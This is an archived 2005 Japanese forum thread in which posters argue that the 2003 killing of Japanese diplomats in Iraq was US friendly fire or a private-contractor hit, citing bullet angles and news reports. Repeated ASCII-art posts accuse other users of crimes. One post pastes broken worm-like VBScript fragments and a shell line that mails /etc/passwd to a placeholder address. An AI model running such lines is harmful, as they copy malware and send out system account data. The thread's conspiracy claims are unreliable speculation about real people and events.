X



「奥参事官米軍誤射」ならば小泉は大悪人
0001国連な成しさん
垢版 |
05/05/10 21:45ID:9a.ANMZ6
大量破壊兵器の嘘、フセインを穴倉で発見したのも演出、イラク人犠牲者も2万人どころではなく
10万人超と言う。
収容所の虐待も隠しに隠し続けた。
奥参事官の撃たれた車両も完全公開しない。
嘘だらけの中で、不可解な奥参事官の件だけ信じろと言われても無理がある。
0004国連な成しさん
垢版 |
05/05/11 00:05ID:BzVvawGM
ブッシュが電撃訪問した時の七面鳥?もロウ細工だったことがばれている。
また、小泉は横須賀の戦没者記念館のようなものには顔を出さない。
沖縄の時はテレビの前で嘘泣きをする。
松田聖子のような奴だ。
0006国連な成しさん
垢版 |
05/05/11 09:37ID:ZU5gzW1A
特殊法人改革も結局、天下りを増やすだけでかえって悪くしました。
0007国連な成しさん
垢版 |
05/05/11 14:02ID:2oYz2D/A
野党もだらしない
国政調査権を発動して当該車両の検分をおこなうべきではないか?
0008国連な成しさん
垢版 |
05/05/11 14:09ID:2oYz2D/A
かなりの高さがあるランドクルーザーのボンネットを上から下へ、
ほとんど垂直に撃ち抜くなんてのは並みのクルマからでは不可能。
屋根上に銃座のある軍用車からの射撃と考えるのが常識だろう。
0009国連な成しさん
垢版 |
05/05/11 14:48ID:pEtWpQAQ
このスレタイのセンスは信濃だな。
今頃なんでw
0010国連な成しさん
垢版 |
05/05/12 00:29ID:???
純正信濃国民ならば、


「「奥参事官米軍誤射」でなくとも小泉は大悪人」

としたであろう。
まだまだ甘いな、ふふ。
0011国連な成しさん
垢版 |
05/05/19 11:19ID:k9yodHxg
齋藤氏拉致でPMC/PMF(民間軍事会社)が注目されたけど
PMCは
1. 行動は複数の4WDと乗用車に分乗
2. 服装は私服(一部統一している会社もある)
3. 武装は、M4(M16系)のほか、AKなど。
4. 米軍車列の護衛など
5. 不審者は個人の裁量で、殺害も可。罪には問えない
(ニューズウィーク日本版に写真あり)
1. 奥さん襲撃車両は4WDなど複数の車両
2. 犯行グループは私服にケブラー製ヘルメットを着用
3. 武装は、分隊支援火器のRPK、AK47
4. 襲撃前後に米軍車両が通過
5. 警告射撃と思しき弾痕の他にガラス部分に集中した弾痕
  テロなら、なぜかトドメを刺していないなど疑問が。
以上の共通点が見いだせる
特に5.は、仮にPMCだと罪に問えない=矛先が米軍に向く=自衛隊派遣が猛反発喰らう
など不利益が考えられるんで、「地元武装勢力」をスケープゴートにしたと考えることもできよう

つまり、犯人は、広義の米軍、狭義の民間武装勢力という可能性もあるのか?
地元に米軍基地がある事も考えれば「地元武装勢力」と矛盾しないと政府が踏んだのか?
0012国連な成しさん
垢版 |
05/05/19 12:08ID:???
どうも、藻舞等イラク戦争反対の香具師等の言い分はわかりにくい
イラクでは戦争やってるんだから、官民を問わず、危険はあたりまえ。
靖国の英霊にしても過半数は味方の銃弾との説もあるが、だからと
いって「名誉の戦死」にかわりはなかろう。なぜ、反米の銃弾で
奥参事官が亡くなられたら小泉さんは偉くて、米軍などの銃弾で
亡くなられると小泉さんが大悪人になるか、わかるように説明して
くれたまえ。
0013国連な成しさん
垢版 |
05/05/19 16:46ID:0LLwQLG.
市街散兵戦で同士打ちは、ごく当たり前な出来事
戦争で米軍がやったか否か判断できないが
戦争は、そういうものだ
いやなら、戦争しない政党を指示するか
日本人を止めるしかない
0014国連な成しさん
垢版 |
05/05/19 16:55ID:HQcbEgRA
米軍誤射じゃないので、小泉首相は大善人。
0015国連な成しさん
垢版 |
05/05/19 18:12ID:???
誤射じゃないなら狙い撃ちか?
んなら、コイズミは大大悪人
0017このスレの粘着チンピラどもへ
垢版 |
05/06/02 23:46ID:???
                        \从人从_人从人从_从人从_从人从人从_从
                        ≫ 妄想粘着罪 募金詐欺罪 幼女買春罪は
                        ≫ここで償うんだよ 
                     /| ̄ ̄ ̄|≫ 
                       | .|: 刑務 :|≫
                       | .| .所  :|/Y⌒Y YWYW⌒WYWY⌒YWYW⌒WYW⌒W
    ミミ皿皿皿皿皿皿皿皿皿 |      | 皿皿l ̄ ̄ ̄l皿皿皿_
  ミミ彡ミ.  田 田 田 田. | .|    /| 田   田   田   田 :|
  ミミミミ彡           | .|  /  |             :|皿皿皿皿皿
  ミ彡ミミミj田 田 田 田. | .|/    | 田   田   田   田 :|        |
  ミミミミ巛彡         | .|      |             :|田 田 田│
  ミ彡彡ミミミ         .|./| ̄ ̄ ̄ ̄|              |        │
  ミミミミミミ彡ミ         | |    ╋:‖ | ̄ ̄|  :| ̄ ̄|   |田 .三.   │
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻
0018このスレの粘着チンピラどもへ
垢版 |
05/06/02 23:48ID:???
                        \从人从_人从人从_从人从_从人从人从_从
                        ≫ 妄想粘着罪 募金詐欺罪 幼女買春罪は
                        ≫ここで償うんだよ 
                     /| ̄ ̄ ̄|≫ 
                       | .|: 刑務 :|≫
                       | .| .所  :|/Y⌒Y YWYW⌒WYWY⌒YWYW⌒WYW⌒W
    ミミ皿皿皿皿皿皿皿皿皿 |      | 皿皿l ̄ ̄ ̄l皿皿皿_
  ミミ彡ミ.  田 田 田 田. | .|    /| 田   田   田   田 :|
  ミミミミ彡           | .|  /  |             :|皿皿皿皿皿
  ミ彡ミミミj田 田 田 田. | .|/    | 田   田   田   田 :|        |
  ミミミミ巛彡         | .|      |             :|田 田 田│
  ミ彡彡ミミミ         .|./| ̄ ̄ ̄ ̄|              |        │
┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻│
0019このスレの粘着チンピラどもへ
垢版 |
05/06/02 23:51ID:???
                        \从人从_人从人从_从人从_从人从人从_从
                        ≫ 妄想粘着罪 募金詐欺罪 幼女買春罪は
                        ≫ここで償うんだよ 
                     /| ̄ ̄ ̄|≫ 
                       | .|: 刑務 :|≫
                       | .| .所  :|/Y⌒Y YWYW⌒WYWY⌒YWYW⌒WYW⌒W
    ミミ皿皿皿皿皿皿皿皿皿 |      | 皿皿l ̄ ̄ ̄l皿皿皿_
  ミミ彡ミ.  田 田 田 田. | .|    /| 田   田   田   田 :|
  ミミミミ彡           | .|  /  |             :|皿皿皿皿皿
  ミ彡ミミミj田 田 田 田. | .|/    | 田   田   田   田 :|        |
  ミミミミ巛彡         | .|      |             :|田 田 田│
  ミ彡彡ミミミ         .|./| ̄ ̄ ̄ ̄|              |        │
┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻┻│
0024国連な成しさん
垢版 |
05/06/20 01:37ID:???
>>23

仮説★大使館員を殺したのは?★仮説【6】
http://sports2.2ch.net/test/read.cgi/iraq/1088361131/
  ↑(事実上の本スレ)

【外交官殺害】歴史的車両_亡失の危機!【廃棄処分】
http://sports2.2ch.net/test/read.cgi/iraq/1095922812/
  ↑(証拠隠滅問題に特化、といっても大差はない)

イラクで殺害された外交官の奥さんの…
http://sports2.2ch.net/test/read.cgi/iraq/1070615769/
  ↑(これは、奥大使の娘・千恵子さんのファンスレ)

外交官殺害は米兵によるものだった(激藁
http://sports2.2ch.net/test/read.cgi/iraq/1085208955/
  ↑(1000達してしまったが、名スレ)
0028国連な成しさん
垢版 |
05/06/26 02:47ID:???
>>25-28
ならば、多少は「本スレ」らしいカキコをしたらどうだ。
さもないと、削除依頼出すぞ。w
0029国連な成しさん
垢版 |
05/06/26 03:53ID:???
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
0030国連な成しさん
垢版 |
05/06/26 12:28ID:WZCPhqxs
>>29
必死だな
0031国連な成しさん
垢版 |
05/06/27 00:34ID:???
というか、小泉は、アメリカから一報を受けて、
アメリカが誤射、ないしは故意の工作で、奥らを
殺したのは、充分に承知していたと思う。

それで自衛隊を慌てて派遣したわけだし。
0032国連な成しさん
垢版 |
05/06/27 01:06ID:???
どうも、>>12の香具師の言い分はわかりにくい。
このスレのどこに
「反米の銃弾で奥参事官が亡くなられたら小泉さんは偉い」
なんて言い分があるんだ?
0033国連な成しさん
垢版 |
05/06/27 01:57ID:???
764 名前:あるやーばん ◆FVgZM7PrgI [age] 投稿日:2005/06/26(日) 16:01:39 ID:???


元記事によれば、駐留米軍の傭兵だった斎藤昭彦(負傷後死亡)の身柄を拘束した
武装組織「アンサール・アル・スンナ軍」の代表者も、会談に臨んだ、としてる。

参戦国の日本や英国の首相は、アメの「テロリストとは交渉しない」とする方針を、
子供のように忠実に守り、結果、若き香田証生さん、保護義務のあった斎藤、
ケネス・ビグリー氏(オレンジの囚人服を着せられ、小さな檻に入れられ、命乞いを
していた老人。最期は斬首・晒し首)らを見殺しにした。

つまり、今回の米国の「テロリストとの交渉」は、同盟国に対する明らかな背信行為
ではないか。また、どうして撤兵したフィリピン政府やスペイン政府を非難できようか。

《英語》http://www.abc.net.au/news/newsitems/200506/s1400745.htm
0035国連な成しさん
垢版 |
05/06/28 23:11ID:???
>というか、小泉は、アメリカから一報を受けて、
>アメリカが誤射、ないしは故意の工作で、奥らを
>殺したのは、充分に承知していたと思う。

ここまでソースもなんにもない妄想をどうやったら思いつくんだよ。
0038国連な成しさん
垢版 |
05/06/29 13:28ID:lEOpX7m2
>>31
>アメリカが誤射、ないしは故意の工作で、奥らを
>殺したのは、充分に承知していたと思う
いや、地元の米軍基地と契約した民間軍事会社=地元(に展開する)武装(した民間軍事)勢力と聞いていた可能性はある
PMCは現在罪に問えない(実際誤写やりたい放題だし)から反発は半端ない
仕方なく、地元武装勢力とした可能性はある
ケブラー製ヘルメットに私服の武装勢力ってイラク人では考えられんがPMCならアリだしな。
米軍車列の目撃情報とも一致(車両警護なら)するし
0039国連な成しさん
垢版 |
05/06/29 22:04ID:2WL.mMyw
>いや、地元の米軍基地と契約した民間軍事会社=地元(に展開する)武装(した民間軍事)勢力と聞いていた可能性はある
ありえない。というか可能性はかなり低い。もし、アメリカ人の陰謀(これ自体がお笑いだが。)だったとしても、民間企業に頼むわけがない。
諜報戦に近い陰謀で、民間軍事会社にまかせるなんて、情報漏れが怖くて不可能だよ。国家的陰謀を民間にまかせるなんて聞いたことがない。冷戦華やかなりしころでも、
諜報戦は国家組織がやるものでCIAやKGBが民間にまかせたりするなんてありえないだろう。

それと米軍車列の目撃だが、これはすでに各メディアによって否定されている。

《ハッサン・フセインさん(42)の目撃談,発射音を聞いて,見たら4輪駆動車が道をそれて畑に突っ込むように止まり,すぐ後から米軍の車列が通り過ぎて言った。》
が書くメディアにのってた情報なんだが・・・・。これがおかしいのよ。すでに。
なぜなら、米軍の車列は外交官の車が撃たれた後に、事件発生地点を通り過ぎた事になる。
外交官の車に併走して撃ったのは米軍の車列ではないということになり、誤射の可能性の否定にしかならない。
なにしろ弾痕はあきらかに併走状態で打たれていたし。米軍車列は時間的にもタイミング的にもあっていません。
0040国連な成しさん
垢版 |
05/06/29 23:11ID:lEOpX7m2
>>39
>ありえない。というか可能性はかなり低い。もし、アメリカ人の陰謀(これ自体がお笑いだが。)だったとしても、民間企業に頼むわけがない。
>諜報戦に近い陰謀で、民間軍事会社にまかせるなんて、情報漏れが怖くて不可能だよ。国家的陰謀を民間にまかせるなんて聞いたことがない。冷戦華やかなりしころでも、
>諜報戦は国家組織がやるものでCIAやKGBが民間にまかせたりするなんてありえないだろう。
おまえ何も分かってないな
PMCってのは一般人が就職できる職場ではないんだよ
各国の軍隊で相応の階級に行った実績がないと「就職の誘い」が来ないんだよ
米軍と契約する時点で本社が米英のOB企業しかない。
勿論、高給故に元CIAや元レンジャー等特殊任務に就いたことのある人材が多数供給される訳だから国家的陰謀であっても不自然さはない
0041国連な成しさん
垢版 |
05/06/29 23:21ID:2WL.mMyw
>各国の軍隊で相応の階級に行った実績がないと「就職の誘い」が来ないんだよ
>米軍と契約する時点で本社が米英のOB企業しかない。
>勿論、高給故に元CIAや元レンジャー等特殊任務に就いたことのある人材が多数供給される訳だから国家的陰謀であっても不自然さはない

わかってないのはお前さんです。ならば現役がいくらでもいる国家組織がやればいいじゃないですか?
情報強度がめちゃめちゃ心配なんですが。友好国の外交官を射殺するなんていう陰謀の中でもそうとうなれベルのものを民間委託?アホですか?
それにレンジャー部隊と軍隊で相応の階級にいったものしか誘いがこない?
兵士というのをまったくわかっていませんね。まず相応の階級と言いますが、どんな特殊部隊にすら、下士官レベルやもっとしたの伍長さんなどもいます。
そして軍隊は仕官、下士官、兵卒で動くんです。
よって民間軍事会社は軍隊を模した組織であり、傭兵部隊です、相応の階級のものしか誘いがこないなんて妄想です。仕官ばかりの傭兵部隊でも作るおつもりですか?
相応の階級ではなく、相応の実績という言葉が正しいでしょう。
一兵卒でも兵士として優秀であれば誘いはかかるでしょうし、まとめる指揮官が必要なら仕官に誘いをかけるでしょう。
相応の階級以上でないと誘いがこないなんて妄想です。

それと元CIAや元レンジャーを混同しないでください。CIAは諜報活動で、レンジャーはただの兵士です。
もちろんCIAの人も軍事訓練はうけているでしょうが、兵士としての能力とは違う才能の持ち主でしょう。
傭兵部隊は大抵軍務経験者のあつまりですが、元CIAて人はほとんど聞いたことありませんな。


0042国連な成しさん
垢版 |
05/06/29 23:27ID:???
>>40を信じる奴なんてまともな日本人にはおらんよ。
映画か小説の見過ぎだろう。
0043国連な成しさん
垢版 |
05/06/29 23:35ID:lEOpX7m2
>>39
>それと米軍車列の目撃だが、これはすでに各メディアによって否定されている。
問題は、その否定される為の確認すらとれていないことだがな
確証もなしに否定されてる訳ですか、そうですか
>《ハッサン・フセインさん(42)の目撃談,発射音を聞いて,見たら4輪駆動車が道をそれて畑に突っ込むように止まり,すぐ後から米軍の車列が通り過ぎて言った。》
>が書くメディアにのってた情報なんだが・・・・。これがおかしいのよ。すでに。
>なぜなら、米軍の車列は外交官の車が撃たれた後に、事件発生地点を通り過ぎた事になる。
>外交官の車に併走して撃ったのは米軍の車列ではないということになり、誤射の可能性の否定にしかならない。
>なにしろ弾痕はあきらかに併走状態で打たれていたし。米軍車列は時間的にもタイミング的にもあっていません。
米軍の車列ってのはHMMWVの最高速度が105km/hだから通常は最高でも80km/hで走行することになる
一方、奥さんの方は前日の外務省OB森本敏へのメールで「治安上の問題から最高速度ぎりぎりの150km/hで走り抜ける」と明言していた
即ち、奥車両は米軍車列に後方から高速で接近し、警告射撃の後銃撃されながら追い抜き路肩に突っ込んだ物と考えるのが妥当
また、運転手の致命傷が右側頭部に受けた銃撃だったことから
最初の警告射撃で車内で跳ねた銃弾を頭部に受け運転が不能になったのであれば銃撃されながら追い抜いた理由となりうる
(運転手を処刑したという事実は外務省の報告書にもないし、車体右側からの入射はないことは公安部の調査から明らか)
また銃弾数も追い抜き時に掛かる時間から考えれば矛盾はない(この際、敢えてAK系ではなくFN MAGで想定すると更に矛盾が生じない)
では、なぜその時間帯通行することが事前に分かっていたのか、であるが、奥さんの行動計画は常にCPAに提出しているため、把握することは容易なのである

一方、武装勢力によるものとする外務省の報告書(元にしたとされる米軍の報告書は機密文書でないにも関わらず公表されていない)の場合、
前方を4輪駆動車が塞ぎAK47と思しき銃を発射していたとされるが、被弾数が極端に少なく殺意を持っている割にフロントガラスの被弾が極端に少ない
0044国連な成しさん
垢版 |
05/06/29 23:36ID:lEOpX7m2
>>42
齋藤さん拘束事件の報道くらい把握しておけよ
PMCからのメールが対象者に送られてくるんだけど
0045国連な成しさん
垢版 |
05/06/29 23:44ID:2WL.mMyw
>>43さん

残念ながら、軍用車両から打たれた。という前提がほとんど否定されているんですよ。

被害車両に36カ所の弾痕 警視庁,外交官殺害で検証

 昨年11月に起きたイラクの日本人外交官殺害事件で,銃撃された四輪駆動車には計36カ所の弾痕があり,大半の銃弾は,ほぼ水平方向か下方から撃たれていたことが5日,警視庁の検証で分かった.
 軍用車両の銃座など高い位置から撃たれた形跡はなく,一部で指摘された「米軍誤射説」の可能性はほぼなくなった.四駆車には,奥克彦大使=当時(45)=と井ノ上正盛一等書記官=同(30)=ら3人が乗っていた.
 襲撃現場では,別の四駆車や乗用車など3,4台の車両が並走していたのが目撃されており,これらの車両から銃撃されたとすれば検証結果と矛盾しない.
 関係者によると,弾痕は左側の防弾ガラスとドア部分に集中.発射位置は1メートル程度の高さで,距離は5メートル以内と推定される.大半は水平方向か下方向から撃たれていた.(共同通信)[4月5日16時19分更新]

共同通信からなんですが、これでもお疑いですか?
まぁ、米軍車両の銃座からじゃなくて窓から手をだして打つって方法もないではないが。
0046国連な成しさん
垢版 |
05/06/29 23:49ID:lEOpX7m2
>>41
>わかってないのはお前さんです。ならば現役がいくらでもいる国家組織がやればいいじゃないですか?
>情報強度がめちゃめちゃ心配なんですが。友好国の外交官を射殺するなんていう陰謀の中でもそうとうなれベルのものを民間委託?アホですか?
国家が手を下したことが後々明らかになれば、それは国家の責任です
しかし、PMCを裁く根拠法は存在しない以上、秘密を保持できるOBにやらせる方が責任問題にもならないんだよ
奥さんの場合、公共工事の受注(日系企業が獲った)を巡って、米国の土木最大手の介入を阻止する(雑誌外交フォーラムより)等、CPA内でも目の上のたん瘤であったことは容易に理解できる
>それにレンジャー部隊と軍隊で相応の階級にいったものしか誘いがこない?
>兵士というのをまったくわかっていませんね。まず相応の階級と言いますが、どんな特殊部隊にすら、下士官レベルやもっとしたの伍長さんなどもいます。
>そして軍隊は仕官、下士官、兵卒で動くんです。
>よって民間軍事会社は軍隊を模した組織であり、傭兵部隊です、相応の階級のものしか誘いがこないなんて妄想です。仕官ばかりの傭兵部隊でも作るおつもりですか?
>相応の階級ではなく、相応の実績という言葉が正しいでしょう。
>一兵卒でも兵士として優秀であれば誘いはかかるでしょうし、まとめる指揮官が必要なら仕官に誘いをかけるでしょう。
>相応の階級以上でないと誘いがこないなんて妄想です。
憶測じゃん。おれは各種報道をもとにしてるんだよ。
大体、実績があったら昇級できるだろ。
日給が傭兵部隊と比べ物にならないPMCに経験のない人間を雇うと考えるのは幼稚だろ
傭兵部隊とPMC/PMFの違いを認識されていないようですね
0047国連な成しさん
垢版 |
05/06/29 23:50ID:lEOpX7m2
>>41
>それと元CIAや元レンジャーを混同しないでください。CIAは諜報活動で、レンジャーはただの兵士です。
>もちろんCIAの人も軍事訓練はうけているでしょうが、兵士としての能力とは違う才能の持ち主でしょう。
CIAが諜報活動だけと思ってる時点で痛いな。諜報活動のメインは代理人を使うだけ。
実動部隊はきちんと存在するし
>傭兵部隊は大抵軍務経験者のあつまりですが、元CIAて人はほとんど聞いたことありませんな。
傭兵部隊とPMC/PMFの違いを認識されていないようですね(2回目)
ま、傭兵部隊で有名な(正規軍だけど)フランス外人部隊の場合、ソ連崩壊後は旧ソ諜報部員であるKGBのOBが大量に就職していたが
0049国連な成しさん
垢版 |
05/06/29 23:58ID:???
>大体、実績があったら昇級できるだろ。
士官学校出でないとなかなか仕官には実績があってもなりませんよ。わかってる?経験豊富な中年下士官っていくらでもいるし、軍隊の屋台骨なんですが。
戦果をあげればみんな仕官になれると思っているのはちょっと・・・。
>日給が傭兵部隊と比べ物にならないPMCに経験のない人間を雇うと考えるのは幼稚だろ
経験がない=階級が低いではないことは上で述べたとおりですが。

>しかし、PMCを裁く根拠法は存在しない以上、秘密を保持できるOBにやらせる方が責任問題にもならないんだよ
ならいままで諜報活動でそういった組織が雇われたソースをだしてみてください。冷戦期でもかまいませんが・・・。

それと斉藤さんだって「下士官」でなかったけ?
0050国連な成しさん
垢版 |
05/06/30 00:01ID:Q1vvGCio
>>45
>被害車両に36カ所の弾痕 警視庁,外交官殺害で検証
>(共同通信)[4月5日16時19分更新]
残念ながら、それは本来の意味の入射角ではない
人体のようなソフトターゲットなら入射後の屈折はほとんど無視できるが
車体のようなハードターゲットの場合、入射後に角度が大きく変化する。したがって、その報告書は入射角の分析ではないということになるんだよ
また、肝心の窓の銃痕については、実験等による確認をとらなかったんだが
フロントガラスの様に角度が変わればヒビの入りかたも変わってくる
下からなら傾斜のついたサイドのガラスのヒビは報道のような真円に近い形にはならないんだがね
右側面への到達数が少ないにもかかわらず、車内から銃弾は4発分しか見つからなかったことも注意

さらに、報道陣に公開したとき座席に布が掛けられていたんだが「遺族の心情に配慮して」だったんだが
よく考えれば座席に銃痕があった可能性が高い
被害者の被弾数の合計と右側面到達数を合計しても、36には遠く及ばない
0051国連な成しさん
垢版 |
05/06/30 00:06ID:Q1vvGCio
>>49
>士官学校出でないとなかなか仕官には実績があってもなりませんよ。わかってる?経験豊富な中年下士官っていくらでもいるし、軍隊の屋台骨なんですが。
>戦果をあげればみんな仕官になれると思っているのはちょっと・・・。
すまんが、俺が士官にならないと求人が来ないと書いてるソースはあるのかな?
PMCなんて1社じゃない。報道に出てきただけで?・、黒水なんかがあるけど、それらの基準が何れも同等とは言ってないぜ
>ならいままで諜報活動でそういった組織が雇われたソースをだしてみてください。冷戦期でもかまいませんが・・・。
ん?おれは諜報活動に限定してないぜ
暗殺が諜報活動ならレンジャーもΔも諜報部員ですかw
ちなみにグアンタラモで拷問作業しているのは、罪に問えないPMCも含まれています
0052国連な成しさん
垢版 |
05/06/30 00:09ID:Q1vvGCio
>>49
>それと斉藤さんだって「下士官」でなかったけ?
士官でないとPMCから求人が来ないって俺が書いたって言うならソースだせよ

お前、柘植やテレンスの見過ぎだろうw
0053国連な成しさん
垢版 |
05/06/30 00:22ID:???
えー、テレンスは元傭兵なんだから合ってるんじゃないの?
0054国連な成しさん
垢版 |
05/06/30 01:20ID:???
なんにせよ、イラクのアメリカ軍は、恐怖心にかられての誤射が多すぎる。

伊、米軍の責任を指弾 “誤射”事件で報告書
http://headlines.yahoo.co.jp/hl?a=20050503-00000080-kyodo-int

<イラク>ブルガリア兵士1人死亡 また米軍の誤射?
http://headlines.yahoo.co.jp/hl?a=20050307-00000117-mai-int
★ブルガリア兵の防弾着から米軍の弾丸 「友軍誤射」確実に
《英語》http://abcnews.go.com/US/wireStory?id=564733

0055国連な成しさん
垢版 |
05/06/30 01:34ID:???
テレビのディレクター死亡 バグダッドで米兵が銃撃
http://headlines.yahoo.co.jp/hl?a=20050629-00000242-kyodo-int

 【カイロ29日共同】AP通信によると、イラクの首都バグダッドで28日、地元テレビ局
「アッシャルキーヤ」のディレクター、バクリ氏が米軍の車列に近づき、米兵の銃撃を
受けて死亡した。この1週間にバグダッド周辺で米軍に殺害された報道関係者は
これで3人目となった。
 同局は、バクリ氏が交通事故現場を通り過ぎようとした際、米軍に気付かなかった
ため、撃たれたと説明。米軍は事件の報告がないとしている。
 国際ジャーナリスト組織「国境なき記者団」(本部パリ)は米軍などに事件の調査を
要求した。
 バグダッドでは24日にも、米系報道機関で働くイラク人記者が米兵に殺害された。
米部隊の警告に応じなかったためとみられる。
 また26日には、地元テレビ局で働く女性記者が、米軍が武装勢力に反撃した際に、
撃たれて死亡した。
(共同通信) - 6月29日21時29分更新
0056国連な成しさん
垢版 |
05/06/30 09:39ID:Kt7tkrMQ
>すまんが、俺が士官にならないと求人が来ないと書いてるソースはあるのかな?
>PMCなんて1社じゃない。報道に出てきただけで・、黒水なんかがあるけど、それらの基準が何れも同等とは言ってないぜ
だったらすまない。「相応の階級」ってのは下士官も含むってニュアンスなんだね。
それだったら私のうけとめかたが違ったんだと思う。すまん。
>ん?おれは諜報活動に限定してないぜ
普通の傭兵活動としてならゴマンとあるわなそりゃ。友好国の外交官を撃ち殺すような陰謀に民間企業が関わっていたような事例はある?
って聞いたんだけど。どう考えたって民間企業に政権の命運をかけるような陰謀をまかすとは思えない。
0057国連な成しさん
垢版 |
05/06/30 09:50ID:Kt7tkrMQ
それと・・・。外交官が襲われたとき、ほぼ同時期に韓国人のエンジニアも襲われているという事実は無視ですか?

日本とほぼ同時期に襲われた韓国車両も窓の上部のほうに弾痕がついてるね
「車高の高い軍用車」からしか撃たない限り車体上部やランクルの窓に弾痕ができないんだったら,韓国人技師たちも米軍に襲われたことになるのだが?
この事件では,韓国人技師たちの生存者が「併走してきた車に撃たれた」と言ってる以上,普通自動車からでも角度を変えることで上方に命中させることは十分可能であるという結論しか出せない。

それと
これも共同通信だが、ソフトターゲットやハードターゲットの問題は解決した上で、入射角を調べていると思われる記事なんですが?

イラクで昨年11月,日本人外交官2人が殺害された事件で,襲撃された四輪駆動車は,左斜め前方を並走している車から36発の銃弾を受けていたことが5日,警視庁公安部が発表した検証結果で分かった.うち22発は車内まで到達していた.
 また,銃弾の口径は旧ソ連製自動小銃「AK47」(カラシニコフ)と同じ7.62ミリと判明したが,銃の種類や数は特定できなかった.
 検証結果によると,車両はボンネットなど前部に4カ所,左前ドアに14カ所,左後ろドアに18カ所被弾.うち7発は車両右側まで到達.1発は車外まで貫通していた.
 このうち,撃ち込まれた角度が判明したのは10カ所.最も低い地上77.8センチの弾痕を除き,すべて1メートル以上でほぼ水平かやや上向きに撃ち込まれていた.
 こうした状況から,公安部は襲撃した車両との距離は4メートル以内,発射した高さは約1メートルと判断.並走する車の窓から撃たれたとみており,発射位置が標準で地上約2メートルとされる米軍車両からの誤射の可能性は低いとみている.(時事通信,4月5日16時0分更新)



0058国連な成しさん
垢版 |
05/06/30 12:40ID:Q1vvGCio
>>57
>それと・・・。外交官が襲われたとき、ほぼ同時期に韓国人のエンジニアも襲われているという事実は無視ですか?
無視してませんよ。翌日に起きたヤツでしょ。
>日本とほぼ同時期に襲われた韓国車両も窓の上部のほうに弾痕がついてるね
>「車高の高い軍用車」からしか撃たない限り車体上部やランクルの窓に弾痕ができないんだったら,韓国人技師たちも米軍に襲われたことになるのだが?
そうとも書いてない。弾痕の形状についていってる
銃架使って撃っても窓下部のドア部に矛盾無く当てることは他スレ過去スレで検証済み
韓国人技師の車両には実はルーフ部に弾痕(射出口)がなかったはずだけど
更に右側側面への到達数も奥さんのときと異なりより多かったんじゃなかったかな
>この事件では,韓国人技師たちの生存者が「併走してきた車に撃たれた」と言ってる以上,普通自動車からでも角度を変えることで上方に命中させることは十分可能であるという結論しか出せない。
ここで疑問が生じる。事件の翌日、米軍が警戒しているであろう日になぜ襲撃できたのか。
これは前の事件を隠蔽する為の工作と考えるのが普通だと思うが
0059国連な成しさん
垢版 |
05/06/30 12:48ID:Q1vvGCio
>>57
>イラクで昨年11月,日本人外交官2人が殺害された事件で,襲撃された四輪駆動車は,左斜め前方を並走している車から36発の銃弾を受けていたことが5日,警視庁公安部が発表した検証結果で分かった.うち22発は車内まで到達していた.
> また,銃弾の口径は旧ソ連製自動小銃「AK47」(カラシニコフ)と同じ7.62ミリと判明したが,銃の種類や数は特定できなかった.
判明したのは7.62mmってだけで、NATO弾か否かは成分分析にまわされた
で、結果はAKのものと矛盾しない(口頭で+議事録はあり)とされたが、一部一致しない物が出ている(曳光弾か?)し、AKありきなのでNATO弾との照合は行われていない
0060国連な成しさん
垢版 |
05/06/30 12:54ID:Q1vvGCio
>>57
>検証結果によると,車両はボンネットなど前部に4カ所,左前ドアに14カ所,左後ろドアに18カ所被弾.うち7発は車両右側まで到達.1発は車外まで貫通していた.
>このうち,撃ち込まれた角度が判明したのは10カ所.最も低い地上77.8センチの弾痕を除き,すべて1メートル以上でほぼ水平かやや上向きに撃ち込まれていた.
さて問題です。7発は車両右側まで到達しましたし、被害者の被弾数も2-3発であることが判明しています。貫通できなかった物があることを想定に入れても
7発は少ないのではないでしょうか
また、その前提で座面の被弾数について言及がない。というのも窓上部に複数の貫通孔がありながら右窓下部の到達数が3、上部貫通孔が1だったことから矛盾が生じる
ここから角度の割り出し方法が左ドア→右ドアに到達したものとして銃弾の角度を割り出そうとしたものと捉えるのが正解
勿論、窓上部から右ドアに到達したものとして検証も可能だが敢えてしなかったことと、座面を隠したことから上部から撃たれた可能性は全く否定されていない

>こうした状況から,公安部は襲撃した車両との距離は4メートル以内,発射した高さは約1メートルと判断.
>並走する車の窓から撃たれたとみており,発射位置が標準で地上約2メートルとされる米軍車両からの誤射の可能性は低いとみている.(時事通信,4月5日16時0分更新)
更に、注意すべき点は、奥さんの被弾箇所である腹部の銃創についてだが、ロイター配信の映像には左斜め上から撃たれたときにしかあり得ないものとして写っている
左ドアに寄りかかっても水平にはとてもならないその銃創からも下もしくは水平から撃ち込まれたものとする断定はあり得ない
これを否定する根拠として考えられるものは、弾道がドアに当たったことで大きく変化したというものであるが、そうであるなら公安部の検証は大間違いであるということの証左になる
さらに奥さん井ノ上さんの死因の特定は行われたが、遺体の銃弾の入射角について全く検証されていないことも留意した方が良い

あと韓国人技師の容疑者を拘束されたとされる一報はあったが続報がないねw容疑者って誰だったんだろう
0061国連な成しさん
垢版 |
05/06/30 17:54ID:???
>ここで疑問が生じる。事件の翌日、米軍が警戒しているであろう日になぜ襲撃できたのか。
>これは前の事件を隠蔽する為の工作と考えるのが普通だと思うが

普通じゃないだろう・・・。隠蔽のために韓国人まで襲うのか?
友好国の人間を二回も襲うかよ?
0062国連な成しさん
垢版 |
05/06/30 18:13ID:Q1vvGCio
>>61
>普通じゃないだろう・・・。隠蔽のために韓国人まで襲うのか?
>友好国の人間を二回も襲うかよ?
